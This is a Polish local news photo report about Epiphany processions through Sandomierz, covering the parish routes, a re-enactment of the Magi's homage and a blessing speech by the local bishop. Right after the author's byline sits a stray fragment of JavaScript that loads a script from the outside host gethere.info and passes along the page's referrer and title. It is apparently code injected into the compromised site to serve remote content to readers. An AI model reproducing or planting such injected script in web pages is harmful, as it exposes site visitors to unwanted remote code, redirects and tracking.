Fotorelacje

Trzej Królowie przeszli ulicami Sandomierza

Trzej Królowie przeszli ulicami Sandomierza

Orszaki Trzech Króli przeszły ulicami miasta. Mimo, że termometry wskazywały  -12 stopni Celsjusza, mróz nie przeszkadzał w kolędowaniu. Tłum wiernych na Rynku Starego Miasta oddał cześć Bożemu Dzieciątku. 

W samo południe z  parafii Podwyższenia Krzyża wyruszył pierwszy orszak. Dołączyli do niego parafianie Chrystusa Króla Jedynego Zbawiciela Świata Ojców Pallotynów oraz wierni z kościoła Św. Józefa. W tym samym czasie drugi orszak wyszedł z parafii Nawrócenia świętego Pawła Apostoła, wraz z Dominikanami i wiernymi z Bazyliki Katedralnej. Parafianie z Nadbrzezia rozpoczęli pochód o 11.45.

Wszyscy spotkali się na Rynku Starego Miasta i rozpoczęli wspólną modlitwę. Sandomierskie rycerstwo wykonało rekonstrukcję sceny biblijnej- pokłonu Trzech Mędrców ze Wschodu Królowie przy dźwiękach fanfary oddali hołd nowo narodzonemu Jezusowi i złożyli w darach złoto, kadzidło i mirrę.

-Dziękuję, że mimo mrozu jesteśmy tu wszyscy razem.  Składam podziękowania dla uczestników orszaków, rycerstwa, rowerzystów z Tarnobrzega, władz samorządowych. Wasza obecność nie jest rekonstrukcją czy pochodem ale świadectwem wiary chrześcijańskiej.  Nawiązujemy dziś do tego co zrobili kiedyś Mędrcy ze Wschodu. Mieli dalekowzroczne plany i wyruszyli w nieznaną drogę. To gwiazda ich prowadziła. My realizując nasze cele musimy również patrzeć w Niebo. Zawierzmy Panu Jezusowi  nasze rodziny i wszystkich którzy są bliscy naszemu sercu- powiedział Biskup Sandomierski Krzysztof Nitkiewicz.

Na zakończenie uroczystości biskup udzielił wiernym błogosławieństwa i namawiał do wspólnego kolędowania.

Kinga Kędziora Palińska

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Fotorelacje

Więcej w Fotorelacje

III Bieg Szklarski

tsa24.com27 września 2021

XII Triathlon Ziemi Sandomierskiej- Fotorelacja

tsa24.com23 sierpnia 2021

Klimontów – Kryształowe Berło dla Mirosława Baki

tsa24.com7 lipca 2021

Sandomierz w miniony weekend powitał wakacje

tsa24.com5 lipca 2021

XVI Turniej Halowej Piłki Nożnej o Puchar Burmistrza Miasta i Gminy Koprzywnica

tsa24.com3 marca 2020

Bal Mistrzów Sportu. Fotorelacja

tsa24.com10 lutego 2020

BEZPIECZEŃSTWO PODCZAS 28. FINAŁU WIELKIEJ ORKIESTRY ŚWIĄTECZNEJ POMOCY

tsa24.com9 stycznia 2020

NIETRZEŹWI KIEROWCY NA SANDOMIERSKICH DROGACH

tsa24.com3 stycznia 2020

Niezapomniana noc z gwiazdami sportu – fotorelacja

tsa24.com11 lutego 2019